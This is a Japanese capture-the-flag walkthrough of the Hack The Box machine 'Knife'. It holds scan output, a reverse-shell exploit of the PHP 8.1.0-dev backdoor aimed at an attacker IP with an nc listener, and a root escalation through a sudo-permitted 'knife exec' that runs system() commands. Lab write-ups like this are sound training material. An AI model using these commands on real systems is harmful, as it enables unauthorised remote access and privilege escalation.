Knife – Hack the box

Knife

  • 10.10.10.242
  • knife.htb
  • Port: 22, 80

php8.1.0-devが用いられているようなので以下の脆弱性を使用してuserを取ることが可能です。
PHP 8.1.0-dev Backdoor Remote Command Injection
また、jamesにchefのknifeがsudoで許可されているので、knife execを用いてroot権限でコマンドが実行可能になっています。

$ autorecon 10.10.10.242                                            

[*] Task tcp/22/nmap-ssh on 10.10.10.242 finished successfully in 6 seconds
[-] [10.10.10.242 tcp/80/nmap-http] Scanning 1 service on knife.htb (10.10.10.242)
[-] [10.10.10.242 tcp/80/nmap-http] Completed Service scan at 14:55, 6.32s elapsed (1 service on 1 host)
[-] [10.10.10.242 tcp/80/nmap-http] NSE: Script scanning 10.10.10.242.
[-] [10.10.10.242 tcp/80/nmap-http] NSE: Starting runlevel 1 (of 3) scan.
[-] [10.10.10.242 tcp/80/nmap-http] Initiating NSE at 14:55
[-] [10.10.10.242 tcp/80/whatweb] WhatWeb report for http://10.10.10.242:80
[-] [10.10.10.242 tcp/80/whatweb] Status    : 200 OK
[-] [10.10.10.242 tcp/80/whatweb] Title     : Emergent Medical Idea
[-] [10.10.10.242 tcp/80/whatweb] IP        : 10.10.10.242
[-] [10.10.10.242 tcp/80/whatweb] Country   : RESERVED, ZZ
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] Summary   : Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], HTML5, PHP[8.1.0-dev], Script
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] Detected Plugins:
[-] [10.10.10.242 tcp/80/whatweb] [ Apache ]
[-] [10.10.10.242 tcp/80/whatweb] 	The Apache HTTP Server Project is an effort to develop and
[-] [10.10.10.242 tcp/80/whatweb] 	maintain an open-source HTTP server for modern operating
[-] [10.10.10.242 tcp/80/whatweb] 	systems including UNIX and Windows NT. The goal of this
[-] [10.10.10.242 tcp/80/whatweb] 	project is to provide a secure, efficient and extensible
[-] [10.10.10.242 tcp/80/whatweb] 	server that provides HTTP services in sync with the current
[-] [10.10.10.242 tcp/80/whatweb] 	HTTP standards.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	Version      : 2.4.41 (from HTTP Server Header)
[-] [10.10.10.242 tcp/80/whatweb] 	Google Dorks: (3)
[-] [10.10.10.242 tcp/80/whatweb] 	Website     : http://httpd.apache.org/
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ HTML5 ]
[-] [10.10.10.242 tcp/80/whatweb] 	HTML version 5, detected by the doctype declaration
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ HTTPServer ]
[-] [10.10.10.242 tcp/80/whatweb] 	HTTP server header string. This plugin also attempts to
[-] [10.10.10.242 tcp/80/whatweb] 	identify the operating system from the server header.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	OS           : Ubuntu Linux
[-] [10.10.10.242 tcp/80/whatweb] 	String       : Apache/2.4.41 (Ubuntu) (from server string)
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ PHP ]
[-] [10.10.10.242 tcp/80/whatweb] 	PHP is a widely-used general-purpose scripting language
[-] [10.10.10.242 tcp/80/whatweb] 	that is especially suited for Web development and can be
[-] [10.10.10.242 tcp/80/whatweb] 	embedded into HTML. This plugin identifies PHP errors,
[-] [10.10.10.242 tcp/80/whatweb] 	modules and versions and extracts the local file path and
[-] [10.10.10.242 tcp/80/whatweb] 	username if present.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	Version      : 8.1.0-dev
[-] [10.10.10.242 tcp/80/whatweb] 	Google Dorks: (2)
[-] [10.10.10.242 tcp/80/whatweb] 	Website     : http://www.php.net/
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ Script ]
[-] [10.10.10.242 tcp/80/whatweb] 	This plugin detects instances of script HTML elements and
[-] [10.10.10.242 tcp/80/whatweb] 	returns the script language/type.
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] [ X-Powered-By ]
[-] [10.10.10.242 tcp/80/whatweb] 	X-Powered-By HTTP header
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] 	String       : PHP/8.1.0-dev (from x-powered-by string)
[-] [10.10.10.242 tcp/80/whatweb] 
[-] [10.10.10.242 tcp/80/whatweb] HTTP Headers:
[-] [10.10.10.242 tcp/80/whatweb] 	HTTP/1.1 200 OK
[-] [10.10.10.242 tcp/80/whatweb] 	Date: Mon, 30 Aug 2021 05:55:36 GMT
[-] [10.10.10.242 tcp/80/whatweb] 	Server: Apache/2.4.41 (Ubuntu)
[-] [10.10.10.242 tcp/80/whatweb] 	X-Powered-By: PHP/8.1.0-dev
[-] [10.10.10.242 tcp/80/whatweb] 	Vary: Accept-Encoding
[-] [10.10.10.242 tcp/80/whatweb] 	Content-Encoding: gzip
[-] [10.10.10.242 tcp/80/whatweb] 	Content-Length: 2406
[-] [10.10.10.242 tcp/80/whatweb] 	Connection: close
[-] [10.10.10.242 tcp/80/whatweb] 	Content-Type: text/html; charset=UTF-8
[-] [10.10.10.242 tcp/80/whatweb] 

$ git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce && cd php-8.1.0-dev-backdoor-rce 

# ----
# ローカルで待ち受け
$ nc -lvp 11451
# ----

# revshell_php_8.1.0-dev.py target URL attacker IP attacker PORT
$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.xx.xx 11451 

# ---
james@knife:/$ whoami
james

james@knife:/$ id
uid=1000(james) gid=1000(james) groups=1000(james)

james@knife:/$ ls /home/james
user.txt 

james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

# https://docs.chef.io/workstation/knife_exec/
$ sudo knife exec

system('id')
uid=0(root) gid=0(root) groups=0(root)

# root.txt
system('cat \/root\/root.txt')

コメントする